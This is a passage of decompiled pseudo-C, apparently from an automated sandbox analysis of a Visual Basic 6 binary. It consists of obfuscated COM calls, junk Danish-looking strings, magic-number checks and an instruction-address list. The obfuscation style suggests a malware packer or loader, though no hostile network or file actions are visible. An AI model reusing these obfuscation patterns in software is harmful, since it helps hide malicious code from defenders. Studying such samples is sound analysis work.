					_t1190 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1186,  *((intOrPtr*)( *((intOrPtr*)( *_v328)) + 0x308))( *_v328));
					asm("fclex");
					_v240 = _t1190;
					if(_v240 >= 0) {
						_v332 = _v332 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cfc);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v332 = _t1190;
					}
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push(L"Calelectricity");
					_push(_v108);
					_push(L"STYRETABELLER");
					L0040152A();
					L00401560();
					L00401554();
					L0040156C();
					_v8 = 0xa;
					if( *0x422010 != 0) {
						_v336 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v336 = 0x422010;
					}
					_t1194 =  &_v124;
					L00401566();
					_v236 = _t1194;
					_t1198 =  *((intOrPtr*)( *_v236 + 0xa0))(_v236,  &_v108, _t1194,  *((intOrPtr*)( *((intOrPtr*)( *_v336)) + 0x2fc))( *_v336));
					asm("fclex");
					_v240 = _t1198;
					if(_v240 >= 0) {
						_v340 = _v340 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x403c90);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v340 = _t1198;
					}
					_push(_v108);
					_t1199 =  &_v116;
					_push(_t1199);
					L00401524();
					_push(_t1199);
					_push(L"Tvivlsomst9");
					_t1200 =  &_v112;
					_push(_t1200);
					L00401524();
					_push(_t1200);
					E00403AF8();
					_v224 = _t1200;
					L00401536();
					_v244 =  ~(0 | _v224 == 0x000f33d5);
					_push( &_v116);
					_push( &_v108);
					_push( &_v112);
					_push(3);
					L0040151E();
					_t1452 = _t1438 + 0x10;
					L0040156C();
					if(_v244 != 0) {
						_v8 = 0xb;
						if( *0x422010 != 0) {
							_v344 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x403270);
							L00401578();
							_v344 = 0x422010;
						}
						_t1256 =  &_v124;
						L00401566();
						_v236 = _t1256;
						_t1260 =  *((intOrPtr*)( *_v236 + 0x50))(_v236,  &_v108, _t1256,  *((intOrPtr*)( *((intOrPtr*)( *_v344)) + 0x304))( *_v344));
						asm("fclex");
						_v240 = _t1260;
						if(_v240 >= 0) {
							_v348 = _v348 & 0x00000000;
						} else {
							_push(0x50);
							_push(0x403cfc);
							_push(_v236);
							_push(_v240);
							L00401572();
							_v348 = _t1260;
						}
						if( *0x422010 != 0) {
							_v352 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x403270);
							L00401578();
							_v352 = 0x422010;
						}
						_t1264 =  &_v128;
						L00401566();
						_v244 = _t1264;
						_t1268 =  *((intOrPtr*)( *_v244 + 0x170))(_v244,  &_v112, _t1264,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x30c))( *_v352));
						asm("fclex");
						_v248 = _t1268;
						if(_v248 >= 0) {
							_v356 = _v356 & 0x00000000;
						} else {
							_push(0x170);
							_push(0x403cfc);
							_push(_v244);
							_push(_v248);
							L00401572();
							_v356 = _t1268;
						}
						_push(_v108);
						_push(_v112);
						L00401518();
						L00401560();
						_push( &_v112);
						_push( &_v108);
						_push(2);
						L0040151E();
						_push( &_v128);
						_push( &_v124);
						_push(2);
						L00401512();
						_v8 = 0xc;
						_push( &_v96);
						_push(_a4);
						_push(0x403d50);
						L0040150C();
						_t1452 = _t1452 + 0x24;
					}
					_v8 = 0xe;
					if( *0x422010 != 0) {
						_v360 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v360 = 0x422010;
					}
					_t1211 =  &_v124;
					L00401566();
					_v236 = _t1211;
					_t1215 =  *((intOrPtr*)( *_v236 + 0x110))(_v236,  &_v108, _t1211,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x308))( *_v360));
					asm("fclex");
					_v240 = _t1215;
					if(_v240 >= 0) {
						_v364 = _v364 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x403cfc);
						_push(_v236);
						_push(_v240);
						L00401572();
						_v364 = _t1215;
					}
					if( *0x422010 != 0) {
						_v368 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v368 = 0x422010;
					}
					_t1219 =  &_v128;
					L00401566();
					_v244 = _t1219;
					_t1223 =  *((intOrPtr*)( *_v244 + 0x100))(_v244,  &_v132, _t1219,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x304))( *_v368));
					asm("fclex");
					_v248 = _t1223;
					if(_v248 >= 0) {
						_v372 = _v372 & 0x00000000;
					} else {
						_push(0x100);
						_push(0x403cfc);
						_push(_v244);
						_push(_v248);
						L00401572();
						_v372 = _t1223;
					}
					_push(0);
					_push(0);
					_push(_v132);
					_t1224 =  &_v156;
					_push(_t1224);
					L00401500();
					_push(_t1224);
					L00401506();
					_push(_t1224);
					_push(_v108);
					_t1225 =  &_v112;
					_push(_t1225);
					L00401524();
					_push(_t1225);
					E00403B50();
					_v224 = _t1225;
					L00401536();
					_v252 =  ~(0 | _v224 == 0x001350c4);
					_push( &_v112);
					_push( &_v108);
					_push(2);
					L0040151E();
					_push( &_v132);
					_push( &_v128);
					_push( &_v124);
					_push(3);
					L00401512();
					_t1438 = _t1452 + 0x2c;
					L0040157E();
					if(_v252 != 0) {
						_v8 = 0xf;
						if( *0x422010 != 0) {
							_v376 = 0x422010;
						} else {
							_push(0x422010);
							_push(0x403270);
							L00401578();
							_v376 = 0x422010;
						}
						_t1238 =  &_v124;
						L00401566();
						_v236 = _t1238;
						_t1242 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1238,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x30c))( *_v376));
						asm("fclex");
						_v240 = _t1242;
						if(_v240 >= 0) {
							_v380 = _v380 & 0x00000000;
						} else {
							_push(0x48);
							_push(0x403cfc);
							_push(_v236);
							_push(_v240);
							L00401572();
							_v380 = _t1242;
						}
						_v288 = _v108;
						_v108 = _v108 & 0x00000000;
						_v148 = _v288;
						_v156 = 8;
						_push(0);
						_push(0x80);
						_push( &_v156);
						_push( &_v172);
						L004014EE();
						_push( &_v172);
						_push( &_v176);
						L004014F4();
						_push( &_v176);
						_push( &_v64);
						L004014FA();
						L0040156C();
						_push( &_v172);
						_push( &_v156);
						_push(2);
						L0040153C();
						_t1438 = _t1438 + 0xc;
						_v8 = 0x10;
						_push(0xffffffff);
						L004014E8();
					}
				}
				_v8 = 0x13;
				E00403B94(); // executed
				L00401536();
				_v8 = 0x14;
				if( *0x422010 != 0) {
					_v384 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v384 = 0x422010;
				}
				_t906 =  &_v124;
				L00401566();
				_v236 = _t906;
				_t910 =  *((intOrPtr*)( *_v236 + 0x1e8))(_v236,  &_v196, _t906,  *((intOrPtr*)( *((intOrPtr*)( *_v384)) + 0x2fc))( *_v384));
				asm("fclex");
				_v240 = _t910;
				if(_v240 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x403c90);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v388 = _t910;
				}
				if( *0x422010 != 0) {
					_v392 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v392 = 0x422010;
				}
				_t914 =  &_v128;
				L00401566();
				_v244 = _t914;
				_t918 =  *((intOrPtr*)( *_v244 + 0x1f0))(_v244,  &_v200, _t914,  *((intOrPtr*)( *((intOrPtr*)( *_v392)) + 0x300))( *_v392));
				asm("fclex");
				_v248 = _t918;
				if(_v248 >= 0) {
					_v396 = _v396 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403c90);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v396 = _t918;
				}
				if( *0x422010 != 0) {
					_v400 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v400 = 0x422010;
				}
				_t922 =  &_v132;
				L00401566();
				_v252 = _t922;
				_t926 =  *((intOrPtr*)( *_v252 + 0xe0))(_v252,  &_v204, _t922,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x300))( *_v400));
				asm("fclex");
				_v256 = _t926;
				if(_v256 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x403c90);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v404 = _t926;
				}
				_v220 = _v204;
				_v216 = _v200;
				_v224 = 0x60ba6;
				_v212 = _v196;
				_v208 = 0x54e7;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v208,  &_v212,  &_v224,  &_v216,  &_v220);
				_push( &_v132);
				_push( &_v128);
				_push( &_v124);
				_push(3);
				L00401512();
				_v8 = 0x15;
				if( *0x422010 != 0) {
					_v408 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v408 = 0x422010;
				}
				_t944 =  &_v124;
				L00401566();
				_v236 = _t944;
				_t948 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v224, _t944,  *((intOrPtr*)( *((intOrPtr*)( *_v408)) + 0x308))( *_v408));
				asm("fclex");
				_v240 = _t948;
				if(_v240 >= 0) {
					_v412 = _v412 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v412 = _t948;
				}
				_v228 = 0x2d4eba;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, _v224,  &_v228);
				L0040156C();
				_v8 = 0x16;
				L004014E2();
				_v224 = 0x5e0e95;
				_t957 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x1088,  &_v224,  &_v108);
				_v236 = _t957;
				if(_v236 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x403924);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v416 = _t957;
				}
				L00401554();
				_v8 = 0x17;
				if( *0x422010 != 0) {
					_v420 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v420 = 0x422010;
				}
				_t961 =  &_v124;
				L00401566();
				_v236 = _t961;
				_t965 =  *((intOrPtr*)( *_v236 + 0x60))(_v236,  &_v224, _t961,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x300))( *_v420));
				asm("fclex");
				_v240 = _t965;
				if(_v240 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x403c90);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v424 = _t965;
				}
				if( *0x422010 != 0) {
					_v428 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v428 = 0x422010;
				}
				_t969 =  &_v128;
				L00401566();
				_v244 = _t969;
				_t973 =  *((intOrPtr*)( *_v244 + 0x110))(_v244,  &_v108, _t969,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x308))( *_v428));
				asm("fclex");
				_v248 = _t973;
				if(_v248 >= 0) {
					_v432 = _v432 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x403cfc);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v432 = _t973;
				}
				if( *0x422010 != 0) {
					_v436 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v436 = 0x422010;
				}
				_t977 =  &_v132;
				L00401566();
				_v252 = _t977;
				_t981 =  *((intOrPtr*)( *_v252 + 0x120))(_v252,  &_v228, _t977,  *((intOrPtr*)( *((intOrPtr*)( *_v436)) + 0x308))( *_v436));
				asm("fclex");
				_v256 = _t981;
				if(_v256 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cfc);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v440 = _t981;
				}
				_v232 = _v224;
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v232, _v108, _v228,  &_v196);
				_v40 = _v196;
				L00401554();
				L00401512();
				_v8 = 0x18;
				_t995 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v224, 3,  &_v124,  &_v128,  &_v132);
				_v236 = _t995;
				if(_v236 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x403924);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v444 = _t995;
				}
				_v100 = _v224;
				_v8 = 0x19;
				if( *0x422010 != 0) {
					_v448 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v448 = 0x422010;
				}
				_t1000 =  &_v124;
				L00401566();
				_v236 = _t1000;
				_t1004 =  *((intOrPtr*)( *_v236 + 0x48))(_v236,  &_v108, _t1000,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x304))( *_v448));
				asm("fclex");
				_v240 = _t1004;
				if(_v240 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v452 = _t1004;
				}
				if( *0x422010 != 0) {
					_v456 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v456 = 0x422010;
				}
				_t1008 =  &_v128;
				L00401566();
				_v244 = _t1008;
				_t1012 =  *((intOrPtr*)( *_v244 + 0xf8))(_v244,  &_v196, _t1008,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x2fc))( *_v456));
				asm("fclex");
				_v248 = _t1012;
				if(_v248 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403c90);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v460 = _t1012;
				}
				_v200 = _v196;
				_v292 = _v108;
				_v108 = _v108 & 0x00000000;
				L00401560();
				_v224 = 0x20032;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, 0x4dde,  &_v224,  &_v112,  &_v200, L"Koaguleringerne7",  &_v116);
				_v296 = _v116;
				_v116 = _v116 & 0x00000000;
				L00401560();
				L00401554();
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				_v8 = 0x1a;
				if( *0x422010 != 0) {
					_v464 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v464 = 0x422010;
				}
				_t1028 =  &_v124;
				L00401566();
				_v236 = _t1028;
				_t1032 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v128, _t1028,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x30c))( *_v464));
				asm("fclex");
				_v240 = _t1032;
				if(_v240 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v468 = _t1032;
				}
				_push(0);
				_push(0);
				_push(_v128);
				_push( &_v156); // executed
				L00401500(); // executed
				if( *0x422010 != 0) {
					_v472 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v472 = 0x422010;
				}
				_t1037 =  &_v132;
				L00401566();
				_v244 = _t1037;
				_t1041 =  *((intOrPtr*)( *_v244 + 0x1e0))(_v244,  &_v108, _t1037,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x2fc))( *_v472));
				asm("fclex");
				_v248 = _t1041;
				if(_v248 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403c90);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v476 = _t1041;
				}
				if( *0x422010 != 0) {
					_v480 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v480 = 0x422010;
				}
				_t1045 =  &_v136;
				L00401566();
				_v252 = _t1045;
				_t1049 =  *((intOrPtr*)( *_v252 + 0x140))(_v252,  &_v196, _t1045,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x30c))( *_v480));
				asm("fclex");
				_v256 = _t1049;
				if(_v256 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403cfc);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v484 = _t1049;
				}
				_v300 = _v108;
				_v108 = _v108 & 0x00000000;
				L00401560();
				L004014DC();
				L00401560();
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v112, 0x41135d,  &_v116, _v196,  &_v120,  &_v156);
				_v304 = _v120;
				_v120 = _v120 & 0x00000000;
				L00401560();
				_push( &_v116);
				_push( &_v112);
				_push(2);
				L0040151E();
				_push( &_v128);
				_push( &_v136);
				_push( &_v132);
				_push( &_v124);
				_push(4);
				L00401512();
				L0040157E();
				_v8 = 0x1b;
				if( *0x422010 != 0) {
					_v488 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v488 = 0x422010;
				}
				_t1068 =  &_v124;
				L00401566();
				_v236 = _t1068;
				_t1072 =  *((intOrPtr*)( *_v236 + 0x120))(_v236,  &_v224, _t1068,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x308))( *_v488));
				asm("fclex");
				_v240 = _t1072;
				if(_v240 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v492 = _t1072;
				}
				if( *0x422010 != 0) {
					_v496 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v496 = 0x422010;
				}
				_t1076 =  &_v128;
				L00401566();
				_v244 = _t1076;
				_t1080 =  *((intOrPtr*)( *_v244 + 0x140))(_v244,  &_v196, _t1076,  *((intOrPtr*)( *((intOrPtr*)( *_v496)) + 0x304))( *_v496));
				asm("fclex");
				_v248 = _t1080;
				if(_v248 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x403cfc);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v500 = _t1080;
				}
				_v200 = _v196;
				_v228 = _v224;
				_t1088 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v228, L"Hvepsetaljer",  &_v200,  &_v232);
				_v252 = _t1088;
				if(_v252 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x403924);
					_push(_a4);
					_push(_v252);
					L00401572();
					_v504 = _t1088;
				}
				_v72 = _v232;
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				_v8 = 0x1c;
				if( *0x422010 != 0) {
					_v508 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v508 = 0x422010;
				}
				_t1095 =  &_v124;
				L00401566();
				_v236 = _t1095;
				_t1099 =  *((intOrPtr*)( *_v236 + 0x180))(_v236,  &_v224, _t1095,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x304))( *_v508));
				asm("fclex");
				_v240 = _t1099;
				if(_v240 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v512 = _t1099;
				}
				if( *0x422010 != 0) {
					_v516 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v516 = 0x422010;
				}
				_t1103 =  &_v128;
				L00401566();
				_v244 = _t1103;
				_t1107 =  *((intOrPtr*)( *_v244 + 0x160))(_v244,  &_v132, _t1103,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x308))( *_v516));
				asm("fclex");
				_v248 = _t1107;
				if(_v248 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403cfc);
					_push(_v244);
					_push(_v248);
					L00401572();
					_v520 = _t1107;
				}
				_push(0);
				_push(0);
				_push(_v132);
				_push( &_v156);
				L00401500();
				if( *0x422010 != 0) {
					_v524 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v524 = 0x422010;
				}
				_t1112 =  &_v136;
				L00401566();
				_v252 = _t1112;
				_t1116 =  *((intOrPtr*)( *_v252 + 0x108))(_v252,  &_v196, _t1112,  *((intOrPtr*)( *((intOrPtr*)( *_v524)) + 0x300))( *_v524));
				asm("fclex");
				_v256 = _t1116;
				if(_v256 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x403c90);
					_push(_v252);
					_push(_v256);
					L00401572();
					_v528 = _t1116;
				}
				if( *0x422010 != 0) {
					_v532 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v532 = 0x422010;
				}
				_t1120 =  &_v140;
				L00401566();
				_v260 = _t1120;
				_t1124 =  *((intOrPtr*)( *_v260 + 0xd8))(_v260,  &_v200, _t1120,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x300))( *_v532));
				asm("fclex");
				_v264 = _t1124;
				if(_v264 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x403c90);
					_push(_v260);
					_push(_v264);
					L00401572();
					_v536 = _t1124;
				}
				_v204 = _v196;
				_v228 = _v224;
				_t1128 =  &_v156;
				L00401506();
				 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x4863,  &_v228, _t1128, _t1128,  &_v204, _v200);
				_push( &_v132);
				_push( &_v140);
				_push( &_v136);
				_push( &_v128);
				_push( &_v124);
				_push(5);
				L00401512();
				L0040157E();
				_v8 = 0x1d;
				if( *0x422010 != 0) {
					_v540 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v540 = 0x422010;
				}
				_t1141 =  &_v124;
				L00401566();
				_v236 = _t1141;
				_t1145 =  *((intOrPtr*)( *_v236 + 0x130))(_v236,  &_v128, _t1141,  *((intOrPtr*)( *((intOrPtr*)( *_v540)) + 0x304))( *_v540));
				asm("fclex");
				_v240 = _t1145;
				if(_v240 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v544 = _t1145;
				}
				L00401500();
				L004014E2();
				_v196 = 0x55da;
				_v224 = 0x3a4bff;
				_t1149 =  &_v156;
				L004014DC();
				L00401560();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v224, 0x361572,  &_v196, _t1149, _t1149, 0x6fee,  &_v112,  &_v200,  &_v156, _v128, 0, 0);
				_v76 = _v200;
				_push( &_v112);
				_push( &_v108);
				_push(2);
				L0040151E();
				_push( &_v128);
				_push( &_v124);
				_push(2);
				L00401512();
				L0040157E();
				_v8 = 0x1e;
				if( *0x422010 != 0) {
					_v548 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v548 = 0x422010;
				}
				_t1163 =  &_v124;
				L00401566();
				_v236 = _t1163;
				_t1167 =  *((intOrPtr*)( *_v236 + 0xf8))(_v236,  &_v196, _t1163,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x304))( *_v548));
				asm("fclex");
				_v240 = _t1167;
				if(_v240 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403cfc);
					_push(_v236);
					_push(_v240);
					L00401572();
					_v552 = _t1167;
				}
				_v200 = _v196;
				L004014E2();
				L004014E2();
				_t1174 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x2e8fdf, 0x45e2,  &_v108, 0x37d3ea,  &_v112,  &_v200);
				_v244 = _t1174;
				if(_v244 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x403924);
					_push(_a4);
					_push(_v244);
					L00401572();
					_v556 = _t1174;
				}
				L0040151E();
				L0040156C();
				_v8 = 0x1f;
				_t1180 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v156, 2,  &_v108,  &_v112);
				_v236 = _t1180;
				if(_v236 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x403924);
					_push(_a4);
					_push(_v236);
					L00401572();
					_v560 = _t1180;
				}
				L0040157E();
				_v20 = 0;
				_push(0x41ec9d);
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				_push( &_v64);
				_push(0);
				L004014D6();
				_t1182 =  &_v68;
				_push(_t1182);
				_push(0);
				L004014D6();
				L00401554();
				L0040157E();
				L00401554();
				return _t1182;
			}

0x0041cde7
0x0041cdf6
0x0041ce02
0x0041ce0a
0x0041ce0d
0x0041ce1a
0x0041ce23
0x0041ce26
0x0041ce35
0x0041ce38
0x0041ce3f
0x0041ce46
0x0041ce4b
0x0041ce56
0x0041ce57
0x0041ce5c
0x0041ce66
0x0041ce76
0x0041ce77
0x0041ce7d
0x0041ce7e
0x0041ce83
0x0041ce90
0x0041ce9e
0x0041cea4
0x0041ceb2
0x0041cecf
0x0041ceb4
0x0041ceb4
0x0041ceb9
0x0041cebe
0x0041cec3
0x0041cec3
0x0041cee1
0x0041cef9
0x0041cefc
0x0041cefe
0x0041cf0b
0x0041cf2d
0x0041cf0d
0x0041cf0d
0x0041cf0f
0x0041cf14
0x0041cf1a
0x0041cf20
0x0041cf25
0x0041cf25
0x0041cf37
0x0041cf52
0x0041cf58
0x0041cf5a
0x0041cf67
0x0041cf8c
0x0041cf69
0x0041cf69
0x0041cf6e
0x0041cf73
0x0041cf79
0x0041cf7f
0x0041cf84
0x0041cf84
0x0041cf9a
0x0041cfa1
0x0041cfa6
0x0041cfb4
0x0041cfd1
0x0041cfb6
0x0041cfb6
0x0041cfbb
0x0041cfc0
0x0041cfc5
0x0041cfc5
0x0041cff5
0x0041cff9
0x0041cffe
0x0041d016
0x0041d01c
0x0041d01e
0x0041d02b
0x0041d050
0x0041d02d
0x0041d02d
0x0041d032
0x0041d037
0x0041d03d
0x0041d043
0x0041d048
0x0041d048
0x0041d057
0x0041d05c
0x0041d05f
0x0041d069
0x0041d071
0x0041d079
0x0041d079
0x0041d07e
0x0041d085
0x0041d08f
0x0041d099
0x0041d09b
0x0041d0a3
0x0041d0a4
0x0041d0af
0x0041d0b0
0x0041d0b5
0x0041d0bb
0x0041d0bc
0x0041d0c1
0x0041d0c6
0x0041d0d2
0x0041d0d6
0x0041d0d7
0x0041d0e2
0x0041d0e3
0x0041d0e9
0x0041d0ea
0x0041d0ec
0x0041d0f1
0x0041d0f4
0x0041d0fb
0x0041d100
0x0041d106
0x0041d115
0x0041d11b
0x0041d122
0x0041d127
0x0041d131
0x0041d136
0x0041d144
0x0041d161
0x0041d146
0x0041d146
0x0041d14b
0x0041d150
0x0041d155
0x0041d155
0x0041d185
0x0041d189
0x0041d18e
0x0041d1a6
0x0041d1a9
0x0041d1ab
0x0041d1b8
0x0041d1da
0x0041d1ba
0x0041d1ba
0x0041d1bc
0x0041d1c1
0x0041d1c7
0x0041d1cd
0x0041d1d2
0x0041d1d2
0x0041d1e1
0x0041d1e3
0x0041d1e5
0x0041d1e7
0x0041d1ec
0x0041d1ef
0x0041d1f4
0x0041d1fe
0x0041d206
0x0041d20e
0x0041d213
0x0041d221
0x0041d23e
0x0041d223
0x0041d223
0x0041d228
0x0041d22d
0x0041d232
0x0041d232
0x0041d262
0x0041d266
0x0041d26b
0x0041d283
0x0041d289
0x0041d28b
0x0041d298
0x0041d2bd
0x0041d29a
0x0041d29a
0x0041d29f
0x0041d2a4
0x0041d2aa
0x0041d2b0
0x0041d2b5
0x0041d2b5
0x0041d2c4
0x0041d2c7
0x0041d2ca
0x0041d2cb
0x0041d2d0
0x0041d2d1
0x0041d2d6
0x0041d2d9
0x0041d2da
0x0041d2df
0x0041d2e0
0x0041d2e5
0x0041d2eb
0x0041d301
0x0041d30b
0x0041d30f
0x0041d313
0x0041d314
0x0041d316
0x0041d31b
0x0041d321
0x0041d32f
0x0041d335
0x0041d343
0x0041d360
0x0041d345
0x0041d345
0x0041d34a
0x0041d34f
0x0041d354
0x0041d354
0x0041d384
0x0041d388
0x0041d38d
0x0041d3a5
0x0041d3a8
0x0041d3aa
0x0041d3b7
0x0041d3d9
0x0041d3b9
0x0041d3b9
0x0041d3bb
0x0041d3c0
0x0041d3c6
0x0041d3cc
0x0041d3d1
0x0041d3d1
0x0041d3e7
0x0041d404
0x0041d3e9
0x0041d3e9
0x0041d3ee
0x0041d3f3
0x0041d3f8
0x0041d3f8
0x0041d428
0x0041d42c
0x0041d431
0x0041d449
0x0041d44f
0x0041d451
0x0041d45e
0x0041d483
0x0041d460
0x0041d460
0x0041d465
0x0041d46a
0x0041d470
0x0041d476
0x0041d47b
0x0041d47b
0x0041d48a
0x0041d48d
0x0041d490
0x0041d49a
0x0041d4a2
0x0041d4a6
0x0041d4a7
0x0041d4a9
0x0041d4b4
0x0041d4b8
0x0041d4b9
0x0041d4bb
0x0041d4c3
0x0041d4cd
0x0041d4ce
0x0041d4d1
0x0041d4d6
0x0041d4db
0x0041d4db
0x0041d4de
0x0041d4ec
0x0041d509
0x0041d4ee
0x0041d4ee
0x0041d4f3
0x0041d4f8
0x0041d4fd
0x0041d4fd
0x0041d52d
0x0041d531
0x0041d536
0x0041d54e
0x0041d554
0x0041d556
0x0041d563
0x0041d588
0x0041d565
0x0041d565
0x0041d56a
0x0041d56f
0x0041d575
0x0041d57b
0x0041d580
0x0041d580
0x0041d596
0x0041d5b3
0x0041d598
0x0041d598
0x0041d59d
0x0041d5a2
0x0041d5a7
0x0041d5a7
0x0041d5d7
0x0041d5db
0x0041d5e0
0x0041d5f8
0x0041d5fe
0x0041d600
0x0041d60d
0x0041d632
0x0041d60f
0x0041d60f
0x0041d614
0x0041d619
0x0041d61f
0x0041d625
0x0041d62a
0x0041d62a
0x0041d639
0x0041d63b
0x0041d63d
0x0041d640
0x0041d646
0x0041d647
0x0041d64f
0x0041d650
0x0041d655
0x0041d656
0x0041d659
0x0041d65c
0x0041d65d
0x0041d662
0x0041d663
0x0041d668
0x0041d66e
0x0041d684
